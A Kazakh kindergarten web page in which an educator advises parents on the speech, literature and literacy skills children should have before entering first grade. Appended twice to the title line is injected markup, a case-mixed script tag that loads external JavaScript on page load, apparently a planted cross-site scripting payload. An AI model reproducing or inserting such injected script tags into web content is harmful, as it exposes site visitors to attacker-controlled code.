Мектепалды даярлық тобының ата - аналарына кеңес. Калауова Г.С. І-санатты тәрбиеші<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

10.02.2022

Мектеп жасына дейінгі балаларды тәрбиелеп және оқытып 1-сыныпқа қорықпай, еркін дайындалып баруы үшін «Қуаныш» бөбекжайы балаларға қолайлы әрі қауіпсіз білім беруде  Мектепке дейінгі тәрбие мен оқытудың үлгілік оқу бағдарламасын негізге ала отырып, ата-аналарға «Қатынас» білім беру саласы бойынша кеңес береді. Яғни бала бөбекжайдан мектепке барарда нені білуі қажет? Ескере жүріңіз!

Сөйлеуді дамытуда балалар:

  • ана тіліндегі барлық дыбыстарды айта алуы;
  • дыбыстарды анық айтып, ажыратады,  интонацияны игеруі;
  • сөздерге дыбыстық талдау жасай алуы;
  • алуан түрлі заттарды жалпылай және сипаттай алуы;
  • қоршаған орта туралы түсінігі болуы;
  • сурет бойынша сұрақтарға жауап беруі;
  • негізгі ойды дұрыс жеткізе алуы;
  • әңгімелерді бірізді айтып бере алуы;
  • әңгіменің жалғасы мен соңын құрастыра алуы;
  • сюжеттік суреттер бойынша әңгіме құрастыра алуы қажет.      
  • дыбыстарды буынға қосады, сөз тіркесі мен сөйлемді құрастырады;
  • суреттерге сүйеніп ертегілерді айтады;
  • ертегілер ойлап шығарады;
  • түрлі сөз таптарын, салыстыруларды қолданады;
  • құрдастарымен және ересектермен тілдік қарым-қатынаста еркін сұхбаттасады, өз сезімдері мен ойларын  ыммен жеткізеді;
  • ізеттілік, сыпайылық ережелерін біледі.

 

     Көркем әдебиет:

  • әдеби жанрларды ажыратады;
  • өлеңді мәнерлеп жатқа оқиды;
  • шағын шығармаларды айтып бере алады;
  • кітаптарға қызығушылық танытады.
  • сюжеттерді сахналай алады;

 

Сауат ашу негіздері:

  • қалам мен қарындашты дұрыс ұстай алады;
  • қатаң және ұяң дауыссыздарды ажыратады;
  • сөздегі буындардың санын анықтайды;
  • штрихтар салу, заттық суреттердің үстінен басу дағдыларын игерген;
  • жазу дәптерінің бетінде бағдарлай біледі, жазу жолы мен жоларалық кеңістікті ажыратады;
  • дыбыстардың белгілерін ажыратады (дауысты-жуан/жіңішке; дауыссыз-қатаң, ұяң, үнді);
  • берілген сөздерден жай сөйлемдер құрастырады;
Просмотров: 433


Пікір қосу



Деректерді қолтаңбаға қосу